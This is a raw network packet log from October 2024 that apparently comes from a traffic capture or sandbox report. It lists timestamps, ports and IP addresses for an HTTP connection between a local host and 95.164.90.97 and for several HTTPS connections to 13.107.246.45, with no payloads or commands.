Oct 7, 2024 03:15:44.831806898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831820965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831830025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831836939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831849098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831855059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831891060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831892014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831906080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831933022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831938028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831957102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831963062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831973076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.831984043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.831986904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832005978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832007885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832026005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832047939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832063913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832067966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832082987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832098007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832113981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832123041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832129002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832143068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832159996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832163095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832175970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832187891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832218885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832634926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832674980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832680941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832689047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832715034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832734108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832772970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832787991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832823992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832834959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832849979 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832880020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832886934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832904100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832907915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832920074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832950115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832967043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832982063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.832993984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.832995892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833013058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833029032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833035946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833060026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833080053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833086014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833092928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833112001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833121061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833143950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833147049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833161116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833175898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833184958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833199024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833200932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833240032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833246946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833252907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833276033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833283901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833301067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833314896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833331108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833331108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833345890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833360910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833378077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833398104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833403111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833421946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833439112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833439112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833455086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833487034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833487988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833514929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833523989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833540916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833554983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833570004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833578110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833586931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833601952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833602905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833620071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833636045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833642006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833656073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833686113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833690882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833714962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833746910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.833792925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.833880901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.870645046 CEST	443	49865	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.870680094 CEST	443	49865	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.870789051 CEST	49865	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.870805979 CEST	443	49865	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.871176004 CEST	443	49865	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.871231079 CEST	49865	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.872816086 CEST	49868	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.872874975 CEST	443	49868	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.874063015 CEST	49865	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.874085903 CEST	443	49865	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.874108076 CEST	49865	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.874114990 CEST	443	49865	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.876919985 CEST	49869	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.876960039 CEST	443	49869	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.877032042 CEST	49869	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.877481937 CEST	49869	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.877490997 CEST	443	49869	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.880105019 CEST	49870	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.880126953 CEST	443	49870	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.880187988 CEST	49870	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.880801916 CEST	49870	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.880812883 CEST	443	49870	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.921112061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921127081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921152115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921166897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921185970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921202898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921217918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921233892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921235085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921315908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921485901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921541929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921576023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921591043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921619892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921622038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921638012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921664953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921669006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921684027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921700001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921700954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921722889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921725035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921740055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921761990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921765089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921777010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921789885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921802044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921816111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921830893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921839952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921854019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921859980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921869993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921885014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921900988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921911955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921926022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921937943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921941996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921956062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921968937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.921972036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.921987057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922000885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922003984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922017097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922043085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922069073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922281981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922310114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922323942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922331095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922350883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922370911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922395945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922410011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922425985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922439098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922440052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922462940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922483921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922494888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922498941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922513962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922538042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922544956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922564030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922570944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922580004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922595978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922609091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922621965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922637939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922645092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922652960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922667980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922677040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922689915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922704935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922705889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922724009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922738075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922744036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922755957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922765970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922801971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922801971 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922816038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922832012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922846079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922857046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922872066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922883034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922888041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922913074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922919035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922928095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922940969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.922944069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922960043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.922976017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923007011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923012972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923021078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923047066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923060894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923062086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923078060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923088074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923093081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923124075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923140049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923155069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923162937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923180103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923191071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923194885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923214912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923217058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923240900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923273087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923723936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923768997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923783064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923809052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923846006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923863888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923877954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923898935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923923969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923926115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923938990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923953056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923968077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923969030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.923981905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.923995018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924005985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924021959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924036980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924050093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924052954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924068928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924084902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924084902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924113989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924128056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924137115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924186945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924221039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924236059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924258947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924268961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924274921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924290895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924299955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924316883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924326897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924345016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924346924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924360037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924384117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924386024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924411058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924424887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924427032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924441099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924454927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924475908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924485922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924499035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924500942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924515963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924530029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924532890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924546003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924561024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924576998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924577951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924592972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924607992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924618959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924622059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924638987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924638987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924654007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924669981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924679041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924685001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.924716949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.924736023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.933628082 CEST	443	49866	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.934978962 CEST	49866	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.934998035 CEST	443	49866	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.935280085 CEST	49866	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.935285091 CEST	443	49866	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.012310028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012341976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:45.012358904 CEST	80	49782	95.164.90.97	192.168.2.5
